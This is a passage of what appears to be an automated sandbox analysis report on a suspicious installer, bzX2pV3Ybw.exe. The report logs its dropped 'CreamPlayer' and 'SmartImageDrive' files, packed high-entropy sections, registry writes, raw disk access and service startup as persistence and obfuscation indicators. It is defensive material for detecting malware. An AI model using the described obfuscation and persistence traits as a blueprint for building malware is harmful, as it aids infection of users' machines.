                    Source: C:\Users\user\Desktop\bzX2pV3Ybw.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\is-VLOHC.tmp\bzX2pV3Ybw.tmpSection loaded: apphelp.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\is-VLOHC.tmp\bzX2pV3Ybw.tmpSection loaded: mpr.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\is-VLOHC.tmp\bzX2pV3Ybw.tmpSection loaded: version.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\is-VLOHC.tmp\bzX2pV3Ybw.tmpSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\is-VLOHC.tmp\bzX2pV3Ybw.tmpSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\is-VLOHC.tmp\bzX2pV3Ybw.tmpSection loaded: textinputframework.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\is-VLOHC.tmp\bzX2pV3Ybw.tmpSection loaded: coreuicomponents.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\is-VLOHC.tmp\bzX2pV3Ybw.tmpSection loaded: coremessaging.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\is-VLOHC.tmp\bzX2pV3Ybw.tmpSection loaded: ntmarta.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\is-VLOHC.tmp\bzX2pV3Ybw.tmpSection loaded: wintypes.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\is-VLOHC.tmp\bzX2pV3Ybw.tmpSection loaded: wintypes.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\is-VLOHC.tmp\bzX2pV3Ybw.tmpSection loaded: wintypes.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\is-VLOHC.tmp\bzX2pV3Ybw.tmpSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\is-VLOHC.tmp\bzX2pV3Ybw.tmpSection loaded: wldp.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\is-VLOHC.tmp\bzX2pV3Ybw.tmpSection loaded: profapi.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\is-VLOHC.tmp\bzX2pV3Ybw.tmpSection loaded: shfolder.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\is-VLOHC.tmp\bzX2pV3Ybw.tmpSection loaded: rstrtmgr.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\is-VLOHC.tmp\bzX2pV3Ybw.tmpSection loaded: ncrypt.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\is-VLOHC.tmp\bzX2pV3Ybw.tmpSection loaded: ntasn1.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\is-VLOHC.tmp\bzX2pV3Ybw.tmpSection loaded: msacm32.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\is-VLOHC.tmp\bzX2pV3Ybw.tmpSection loaded: winmmbase.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\is-VLOHC.tmp\bzX2pV3Ybw.tmpSection loaded: winmmbase.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\is-VLOHC.tmp\bzX2pV3Ybw.tmpSection loaded: textshaping.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\is-VLOHC.tmp\bzX2pV3Ybw.tmpSection loaded: riched20.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\is-VLOHC.tmp\bzX2pV3Ybw.tmpSection loaded: usp10.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\is-VLOHC.tmp\bzX2pV3Ybw.tmpSection loaded: msls31.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\is-VLOHC.tmp\bzX2pV3Ybw.tmpSection loaded: sspicli.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\is-VLOHC.tmp\bzX2pV3Ybw.tmpSection loaded: explorerframe.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\is-VLOHC.tmp\bzX2pV3Ybw.tmpSection loaded: sfc.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\is-VLOHC.tmp\bzX2pV3Ybw.tmpSection loaded: sfc_os.dllJump to behavior
                    Source: C:\Windows\SysWOW64\net.exeSection loaded: mpr.dllJump to behavior
                    Source: C:\Windows\SysWOW64\net.exeSection loaded: wkscli.dllJump to behavior
                    Source: C:\Windows\SysWOW64\net.exeSection loaded: netutils.dllJump to behavior
                    Source: C:\Windows\SysWOW64\net.exeSection loaded: samcli.dllJump to behavior
                    Source: C:\Windows\SysWOW64\net.exeSection loaded: srvcli.dllJump to behavior
                    Source: C:\Windows\SysWOW64\net.exeSection loaded: iphlpapi.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\CreamPlayer 1.12\creamplayer_x32.exeSection loaded: sqlite3.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\CreamPlayer 1.12\creamplayer_x32.exeSection loaded: appxsip.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\CreamPlayer 1.12\creamplayer_x32.exeSection loaded: opcservices.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\CreamPlayer 1.12\creamplayer_x32.exeSection loaded: ntmarta.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\CreamPlayer 1.12\creamplayer_x32.exeSection loaded: wininet.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\CreamPlayer 1.12\creamplayer_x32.exeSection loaded: iphlpapi.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\CreamPlayer 1.12\creamplayer_x32.exeSection loaded: dhcpcsvc.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\CreamPlayer 1.12\creamplayer_x32.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\CreamPlayer 1.12\creamplayer_x32.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\CreamPlayer 1.12\creamplayer_x32.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\CreamPlayer 1.12\creamplayer_x32.exeSection loaded: iertutil.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\CreamPlayer 1.12\creamplayer_x32.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\CreamPlayer 1.12\creamplayer_x32.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\CreamPlayer 1.12\creamplayer_x32.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\CreamPlayer 1.12\creamplayer_x32.exeSection loaded: winhttp.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\CreamPlayer 1.12\creamplayer_x32.exeSection loaded: mswsock.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\CreamPlayer 1.12\creamplayer_x32.exeSection loaded: winnsi.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\CreamPlayer 1.12\creamplayer_x32.exeSection loaded: urlmon.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\CreamPlayer 1.12\creamplayer_x32.exeSection loaded: srvcli.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\CreamPlayer 1.12\creamplayer_x32.exeSection loaded: netutils.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\CreamPlayer 1.12\creamplayer_x32.exeSection loaded: schannel.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\CreamPlayer 1.12\creamplayer_x32.exeSection loaded: mskeyprotect.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\CreamPlayer 1.12\creamplayer_x32.exeSection loaded: ntasn1.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\CreamPlayer 1.12\creamplayer_x32.exeSection loaded: msasn1.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\CreamPlayer 1.12\creamplayer_x32.exeSection loaded: dpapi.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\CreamPlayer 1.12\creamplayer_x32.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\CreamPlayer 1.12\creamplayer_x32.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\CreamPlayer 1.12\creamplayer_x32.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\CreamPlayer 1.12\creamplayer_x32.exeSection loaded: gpapi.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\CreamPlayer 1.12\creamplayer_x32.exeSection loaded: ncrypt.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\CreamPlayer 1.12\creamplayer_x32.exeSection loaded: ncryptsslp.dllJump to behavior
                    Source: C:\Windows\SysWOW64\net1.exeSection loaded: samcli.dllJump to behavior
                    Source: C:\Windows\SysWOW64\net1.exeSection loaded: netutils.dllJump to behavior
                    Source: C:\Windows\SysWOW64\net1.exeSection loaded: dsrole.dllJump to behavior
                    Source: C:\Windows\SysWOW64\net1.exeSection loaded: srvcli.dllJump to behavior
                    Source: C:\Windows\SysWOW64\net1.exeSection loaded: wkscli.dllJump to behavior
                    Source: C:\Windows\SysWOW64\net1.exeSection loaded: logoncli.dllJump to behavior
                    Source: C:\Windows\SysWOW64\net1.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\is-VLOHC.tmp\bzX2pV3Ybw.tmpKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{00BB2765-6A77-11D0-A535-00C04FD7D062}\InProcServer32Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\is-VLOHC.tmp\bzX2pV3Ybw.tmpKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion RegisteredOwnerJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\is-VLOHC.tmp\bzX2pV3Ybw.tmpWindow found: window name: TMainFormJump to behavior
                    Source: Window RecorderWindow detected: More than 3 window changes detected
                    Source: C:\Users\user\AppData\Local\Temp\is-VLOHC.tmp\bzX2pV3Ybw.tmpRegistry value created: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\CreamPlayer_is1Jump to behavior
                    Source: bzX2pV3Ybw.exeStatic file information: File size 4096896 > 1048576
                    Source: Binary string: msvcp71.pdbx# source: is-7JNKK.tmp.2.dr
                    Source: Binary string: msvcr71.pdb< source: is-5889C.tmp.2.dr
                    Source: Binary string: msvcp71.pdb source: is-7JNKK.tmp.2.dr
                    Source: Binary string: MicrosoftWindowsGdiPlus-1.0.2600.1360-gdiplus.pdb source: is-FFG28.tmp.2.dr
                    Source: Binary string: msvcr71.pdb source: is-5889C.tmp.2.dr

                    Data Obfuscation

                    barindex
                    Source: C:\Users\user\AppData\Local\CreamPlayer 1.12\creamplayer_x32.exeUnpacked PE file: 5.2.creamplayer_x32.exe.400000.0.unpack .aett3:ER;.aftt3:R;.agtt3:W;.rsrc:R;.ahtt3:EW; vs .text:ER;.rdata:R;.data:W;.vmp0:ER;.rsrc:R;
                    Source: C:\Users\user\AppData\Local\CreamPlayer 1.12\creamplayer_x32.exeUnpacked PE file: 5.2.creamplayer_x32.exe.400000.0.unpack
                    Source: C:\Users\user\AppData\Local\Temp\is-VLOHC.tmp\bzX2pV3Ybw.tmpCode function: 2_2_004502C0 GetVersion,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,2_2_004502C0
                    Source: initial sampleStatic PE information: section where entry point is pointing to: .aett3
                    Source: creamplayer_x32.exe.2.drStatic PE information: section name: .aett3
                    Source: creamplayer_x32.exe.2.drStatic PE information: section name: .aftt3
                    Source: creamplayer_x32.exe.2.drStatic PE information: section name: .agtt3
                    Source: creamplayer_x32.exe.2.drStatic PE information: section name: .ahtt3
                    Source: is-S3M63.tmp.2.drStatic PE information: section name: /4
                    Source: is-S3M63.tmp.2.drStatic PE information: section name: /19
                    Source: is-S3M63.tmp.2.drStatic PE information: section name: /35
                    Source: is-S3M63.tmp.2.drStatic PE information: section name: /51
                    Source: is-S3M63.tmp.2.drStatic PE information: section name: /63
                    Source: is-S3M63.tmp.2.drStatic PE information: section name: /77
                    Source: is-S3M63.tmp.2.drStatic PE information: section name: /89
                    Source: is-S3M63.tmp.2.drStatic PE information: section name: /102
                    Source: is-S3M63.tmp.2.drStatic PE information: section name: /113
                    Source: is-S3M63.tmp.2.drStatic PE information: section name: /124
                    Source: is-FFG28.tmp.2.drStatic PE information: section name: Shared
                    Source: SmartImageDrive.exe.5.drStatic PE information: section name: .aett3
                    Source: SmartImageDrive.exe.5.drStatic PE information: section name: .aftt3
                    Source: SmartImageDrive.exe.5.drStatic PE information: section name: .agtt3
                    Source: SmartImageDrive.exe.5.drStatic PE information: section name: .ahtt3
                    Source: sqlite3.dll.5.drStatic PE information: section name: /4
                    Source: sqlite3.dll.5.drStatic PE information: section name: /19
                    Source: sqlite3.dll.5.drStatic PE information: section name: /35
                    Source: sqlite3.dll.5.drStatic PE information: section name: /51
                    Source: sqlite3.dll.5.drStatic PE information: section name: /63
                    Source: sqlite3.dll.5.drStatic PE information: section name: /77
                    Source: sqlite3.dll.5.drStatic PE information: section name: /89
                    Source: sqlite3.dll.5.drStatic PE information: section name: /102
                    Source: sqlite3.dll.5.drStatic PE information: section name: /113
                    Source: sqlite3.dll.5.drStatic PE information: section name: /124
                    Source: C:\Users\user\Desktop\bzX2pV3Ybw.exeCode function: 0_2_004065C8 push 00406605h; ret 0_2_004065FD
                    Source: C:\Users\user\Desktop\bzX2pV3Ybw.exeCode function: 0_2_004040B5 push eax; ret 0_2_004040F1
                    Source: C:\Users\user\Desktop\bzX2pV3Ybw.exeCode function: 0_2_00408104 push ecx; mov dword ptr [esp], eax0_2_00408109
                    Source: C:\Users\user\Desktop\bzX2pV3Ybw.exeCode function: 0_2_00404185 push 00404391h; ret 0_2_00404389
                    Source: C:\Users\user\Desktop\bzX2pV3Ybw.exeCode function: 0_2_00404206 push 00404391h; ret 0_2_00404389
                    Source: C:\Users\user\Desktop\bzX2pV3Ybw.exeCode function: 0_2_0040C218 push eax; ret 0_2_0040C219
                    Source: C:\Users\user\Desktop\bzX2pV3Ybw.exeCode function: 0_2_004042E8 push 00404391h; ret 0_2_00404389
                    Source: C:\Users\user\Desktop\bzX2pV3Ybw.exeCode function: 0_2_00404283 push 00404391h; ret 0_2_00404389
                    Source: C:\Users\user\Desktop\bzX2pV3Ybw.exeCode function: 0_2_00408F38 push 00408F6Bh; ret 0_2_00408F63
                    Source: C:\Users\user\AppData\Local\Temp\is-VLOHC.tmp\bzX2pV3Ybw.tmpCode function: 2_2_0040994C push 00409989h; ret 2_2_00409981
                    Source: C:\Users\user\AppData\Local\Temp\is-VLOHC.tmp\bzX2pV3Ybw.tmpCode function: 2_2_00483F88 push 00484096h; ret 2_2_0048408E
                    Source: C:\Users\user\AppData\Local\Temp\is-VLOHC.tmp\bzX2pV3Ybw.tmpCode function: 2_2_004062B4 push ecx; mov dword ptr [esp], eax2_2_004062B5
                    Source: C:\Users\user\AppData\Local\Temp\is-VLOHC.tmp\bzX2pV3Ybw.tmpCode function: 2_2_004104E0 push ecx; mov dword ptr [esp], edx2_2_004104E5
                    Source: C:\Users\user\AppData\Local\Temp\is-VLOHC.tmp\bzX2pV3Ybw.tmpCode function: 2_2_00412928 push 0041298Bh; ret 2_2_00412983
                    Source: C:\Users\user\AppData\Local\Temp\is-VLOHC.tmp\bzX2pV3Ybw.tmpCode function: 2_2_00494CAC push ecx; mov dword ptr [esp], ecx2_2_00494CB1
                    Source: C:\Users\user\AppData\Local\Temp\is-VLOHC.tmp\bzX2pV3Ybw.tmpCode function: 2_2_0040CE38 push ecx; mov dword ptr [esp], edx2_2_0040CE3A
                    Source: C:\Users\user\AppData\Local\Temp\is-VLOHC.tmp\bzX2pV3Ybw.tmpCode function: 2_2_004592D0 push 00459314h; ret 2_2_0045930C
                    Source: C:\Users\user\AppData\Local\Temp\is-VLOHC.tmp\bzX2pV3Ybw.tmpCode function: 2_2_0040F398 push ecx; mov dword ptr [esp], edx2_2_0040F39A
                    Source: C:\Users\user\AppData\Local\Temp\is-VLOHC.tmp\bzX2pV3Ybw.tmpCode function: 2_2_00443440 push ecx; mov dword ptr [esp], ecx2_2_00443444
                    Source: C:\Users\user\AppData\Local\Temp\is-VLOHC.tmp\bzX2pV3Ybw.tmpCode function: 2_2_0040546D push eax; ret 2_2_004054A9
                    Source: C:\Users\user\AppData\Local\Temp\is-VLOHC.tmp\bzX2pV3Ybw.tmpCode function: 2_2_0040553D push 00405749h; ret 2_2_00405741
                    Source: C:\Users\user\AppData\Local\Temp\is-VLOHC.tmp\bzX2pV3Ybw.tmpCode function: 2_2_004055BE push 00405749h; ret 2_2_00405741
                    Source: C:\Users\user\AppData\Local\Temp\is-VLOHC.tmp\bzX2pV3Ybw.tmpCode function: 2_2_00485678 push ecx; mov dword ptr [esp], ecx2_2_0048567D
                    Source: C:\Users\user\AppData\Local\Temp\is-VLOHC.tmp\bzX2pV3Ybw.tmpCode function: 2_2_0040563B push 00405749h; ret 2_2_00405741
                    Source: C:\Users\user\AppData\Local\Temp\is-VLOHC.tmp\bzX2pV3Ybw.tmpCode function: 2_2_004056A0 push 00405749h; ret 2_2_00405741
                    Source: C:\Users\user\AppData\Local\Temp\is-VLOHC.tmp\bzX2pV3Ybw.tmpCode function: 2_2_004517F8 push 0045182Bh; ret 2_2_00451823
                    Source: C:\Users\user\AppData\Local\Temp\is-VLOHC.tmp\bzX2pV3Ybw.tmpCode function: 2_2_004519BC push ecx; mov dword ptr [esp], eax2_2_004519C1
                    Source: C:\Users\user\AppData\Local\Temp\is-VLOHC.tmp\bzX2pV3Ybw.tmpCode function: 2_2_00477B08 push ecx; mov dword ptr [esp], edx2_2_00477B09
                    Source: C:\Users\user\AppData\Local\Temp\is-VLOHC.tmp\bzX2pV3Ybw.tmpCode function: 2_2_00419C28 push ecx; mov dword ptr [esp], ecx2_2_00419C2D
                    Source: C:\Users\user\AppData\Local\Temp\is-VLOHC.tmp\bzX2pV3Ybw.tmpCode function: 2_2_0045FD1C push ecx; mov dword ptr [esp], ecx2_2_0045FD20
                    Source: C:\Users\user\AppData\Local\Temp\is-VLOHC.tmp\bzX2pV3Ybw.tmpCode function: 2_2_00499D30 pushad ; retf 2_2_00499D3F
                    Source: creamplayer_x32.exe.2.drStatic PE information: section name: .aett3 entropy: 7.748755273599529
                    Source: SmartImageDrive.exe.5.drStatic PE information: section name: .aett3 entropy: 7.748755273599529

                    Persistence and Installation Behavior

                    barindex
                    Source: C:\Users\user\AppData\Local\CreamPlayer 1.12\creamplayer_x32.exeCode function: CreateFileA,DeviceIoControl,GetLastError,CloseHandle, \\.\PhysicalDrive05_2_02D4E898
                    Source: C:\Users\user\AppData\Local\Temp\is-VLOHC.tmp\bzX2pV3Ybw.tmpFile created: C:\Users\user\AppData\Local\CreamPlayer 1.12\msvcp71.dll (copy)Jump to dropped file
                    Source: C:\Users\user\AppData\Local\CreamPlayer 1.12\creamplayer_x32.exeFile created: C:\ProgramData\SmartImageDrive\sqlite3.dllJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\is-VLOHC.tmp\bzX2pV3Ybw.tmpFile created: C:\Users\user\AppData\Local\CreamPlayer 1.12\uninstall\is-9AR6U.tmpJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\is-VLOHC.tmp\bzX2pV3Ybw.tmpFile created: C:\Users\user\AppData\Local\CreamPlayer 1.12\sqlite3.dll (copy)Jump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\is-VLOHC.tmp\bzX2pV3Ybw.tmpFile created: C:\Users\user\AppData\Local\CreamPlayer 1.12\gdiplus.dll (copy)Jump to dropped file
                    Source: C:\Users\user\Desktop\bzX2pV3Ybw.exeFile created: C:\Users\user\AppData\Local\Temp\is-VLOHC.tmp\bzX2pV3Ybw.tmpJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\is-VLOHC.tmp\bzX2pV3Ybw.tmpFile created: C:\Users\user\AppData\Local\CreamPlayer 1.12\is-FFG28.tmpJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\is-VLOHC.tmp\bzX2pV3Ybw.tmpFile created: C:\Users\user\AppData\Local\CreamPlayer 1.12\ltkrn13n.dll (copy)Jump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\is-VLOHC.tmp\bzX2pV3Ybw.tmpFile created: C:\Users\user\AppData\Local\CreamPlayer 1.12\creamplayer_x32.exeJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\is-VLOHC.tmp\bzX2pV3Ybw.tmpFile created: C:\Users\user\AppData\Local\CreamPlayer 1.12\creamplayer_x32.dll (copy)Jump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\is-VLOHC.tmp\bzX2pV3Ybw.tmpFile created: C:\Users\user\AppData\Local\CreamPlayer 1.12\is-U5LDH.tmpJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\is-VLOHC.tmp\bzX2pV3Ybw.tmpFile created: C:\Users\user\AppData\Local\CreamPlayer 1.12\is-5889C.tmpJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\is-VLOHC.tmp\bzX2pV3Ybw.tmpFile created: C:\Users\user\AppData\Local\CreamPlayer 1.12\uninstall\unins000.exe (copy)Jump to dropped file
                    Source: C:\Users\user\AppData\Local\CreamPlayer 1.12\creamplayer_x32.exeFile created: C:\ProgramData\SmartImageDrive\SmartImageDrive.exeJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\is-VLOHC.tmp\bzX2pV3Ybw.tmpFile created: C:\Users\user\AppData\Local\CreamPlayer 1.12\is-AG5KU.tmpJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\is-VLOHC.tmp\bzX2pV3Ybw.tmpFile created: C:\Users\user\AppData\Local\CreamPlayer 1.12\LTDIS13n.dll (copy)Jump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\is-VLOHC.tmp\bzX2pV3Ybw.tmpFile created: C:\Users\user\AppData\Local\CreamPlayer 1.12\is-S3M63.tmpJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\is-VLOHC.tmp\bzX2pV3Ybw.tmpFile created: C:\Users\user\AppData\Local\Temp\is-DCP4R.tmp\_isetup\_setup64.tmpJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\is-VLOHC.tmp\bzX2pV3Ybw.tmpFile created: C:\Users\user\AppData\Local\CreamPlayer 1.12\is-7JNKK.tmpJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\is-VLOHC.tmp\bzX2pV3Ybw.tmpFile created: C:\Users\user\AppData\Local\Temp\is-DCP4R.tmp\_isetup\_iscrypt.dllJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\is-VLOHC.tmp\bzX2pV3Ybw.tmpFile created: C:\Users\user\AppData\Local\Temp\is-DCP4R.tmp\_isetup\_shfoldr.dllJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\is-VLOHC.tmp\bzX2pV3Ybw.tmpFile created: C:\Users\user\AppData\Local\CreamPlayer 1.12\is-2031L.tmpJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\is-VLOHC.tmp\bzX2pV3Ybw.tmpFile created: C:\Users\user\AppData\Local\CreamPlayer 1.12\msvcr71.dll (copy)Jump to dropped file
                    Source: C:\Users\user\AppData\Local\CreamPlayer 1.12\creamplayer_x32.exeFile created: C:\ProgramData\SmartImageDrive\sqlite3.dllJump to dropped file
                    Source: C:\Users\user\AppData\Local\CreamPlayer 1.12\creamplayer_x32.exeFile created: C:\ProgramData\SmartImageDrive\SmartImageDrive.exeJump to dropped file

                    Boot Survival

                    barindex
                    Source: C:\Users\user\AppData\Local\CreamPlayer 1.12\creamplayer_x32.exeCode function: CreateFileA,DeviceIoControl,GetLastError,CloseHandle, \\.\PhysicalDrive05_2_02D4E898
                    Source: C:\Users\user\AppData\Local\CreamPlayer 1.12\creamplayer_x32.exeCode function: 5_2_00401724 StartServiceCtrlDispatcherA,5_2_00401724
                    Source: C:\Users\user\AppData\Local\Temp\is-VLOHC.tmp\bzX2pV3Ybw.tmpCode function: 2_2_00423C0C IsIconic,PostMessageA,PostMessageA,PostMessageA,SendMessageA,IsWindowEnabled,IsWindowEnabled,IsWindowVisible,GetFocus,SetFocus,SetFocus,IsIconic,GetFocus,SetFocus,2_2_00423C0C
                    Source: C:\Users\user\AppData\Local\Temp\is-VLOHC.tmp\bzX2pV3Ybw.tmpCode function: 2_2_00423C0C IsIconic,PostMessageA,PostMessageA,PostMessageA,SendMessageA,IsWindowEnabled,IsWindowEnabled,IsWindowVisible,GetFocus,SetFocus,SetFocus,IsIconic,GetFocus,SetFocus,2_2_00423C0C
                    Source: C:\Users\user\AppData\Local\Temp\is-VLOHC.tmp\bzX2pV3Ybw.tmpCode function: 2_2_004241DC IsIconic,SetActiveWindow,SetFocus,2_2_004241DC
                    Source: C:\Users\user\AppData\Local\Temp\is-VLOHC.tmp\bzX2pV3Ybw.tmpCode function: 2_2_00424194 IsIconic,SetActiveWindow,2_2_00424194
                    Source: C:\Users\user\AppData\Local\Temp\is-VLOHC.tmp\bzX2pV3Ybw.tmpCode function: 2_2_00418384 IsIconic,GetWindowPlacement,GetWindowRect,GetWindowLongA,GetWindowLongA,ScreenToClient,ScreenToClient,2_2_00418384
                    Source: C:\Users\user\AppData\Local\Temp\is-VLOHC.tmp\bzX2pV3Ybw.tmpCode function: 2_2_0042285C SendMessageA,ShowWindow,ShowWindow,CallWindowProcA,SendMessageA,ShowWindow,SetWindowPos,GetActiveWindow,IsIconic,SetWindowPos,SetActiveWindow,ShowWindow,2_2_0042285C
                    Source: C:\Users\user\AppData\Local\Temp\is-VLOHC.tmp\bzX2pV3Ybw.tmpCode function: 2_2_00417598 IsIconic,GetCapture,2_2_00417598
                    Source: C:\Users\user\AppData\Local\Temp\is-VLOHC.tmp\bzX2pV3Ybw.tmpCode function: 2_2_0048393C IsIconic,GetWindowLongA,ShowWindow,ShowWindow,2_2_0048393C
                    Source: C:\Users\user\AppData\Local\Temp\is-VLOHC.tmp\bzX2pV3Ybw.tmpCode function: 2_2_00417CCE IsIconic,SetWindowPos,2_2_00417CCE
                    Source: C:\Users\user\AppData\Local\Temp\is-VLOHC.tmp\bzX2pV3Ybw.tmpCode function: 2_2_00417CD0 IsIconic,SetWindowPos,GetWindowPlacement,SetWindowPlacement,2_2_00417CD0
                    Source: C:\Users\user\AppData\Local\Temp\is-VLOHC.tmp\bzX2pV3Ybw.tmpCode function: 2_2_0041F118 GetVersion,SetErrorMode,LoadLibraryA,SetErrorMode,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,FreeLibrary,2_2_0041F118
                    Source: C:\Users\user\Desktop\bzX2pV3Ybw.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\is-VLOHC.tmp\bzX2pV3Ybw.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\is-VLOHC.tmp\bzX2pV3Ybw.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\is-VLOHC.tmp\bzX2pV3Ybw.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\is-VLOHC.tmp\bzX2pV3Ybw.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\is-VLOHC.tmp\bzX2pV3Ybw.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\is-VLOHC.tmp\bzX2pV3Ybw.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\is-VLOHC.tmp\bzX2pV3Ybw.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\is-VLOHC.tmp\bzX2pV3Ybw.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\is-VLOHC.tmp\bzX2pV3Ybw.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\CreamPlayer 1.12\creamplayer_x32.exeCode function: LoadLibraryA,GetProcAddress,GetAdaptersInfo,FreeLibrary,5_2_02D4E99C
                    Source: C:\Users\user\AppData\Local\CreamPlayer 1.12\creamplayer_x32.exeWindow / User API: threadDelayed 3773Jump to behavior
                    Source: C:\Users\user\AppData\Local\CreamPlayer 1.12\creamplayer_x32.exeWindow / User API: threadDelayed 6154Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\is-VLOHC.tmp\bzX2pV3Ybw.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\CreamPlayer 1.12\msvcp71.dll (copy)Jump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\is-VLOHC.tmp\bzX2pV3Ybw.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\CreamPlayer 1.12\uninstall\is-9AR6U.tmpJump to dropped file
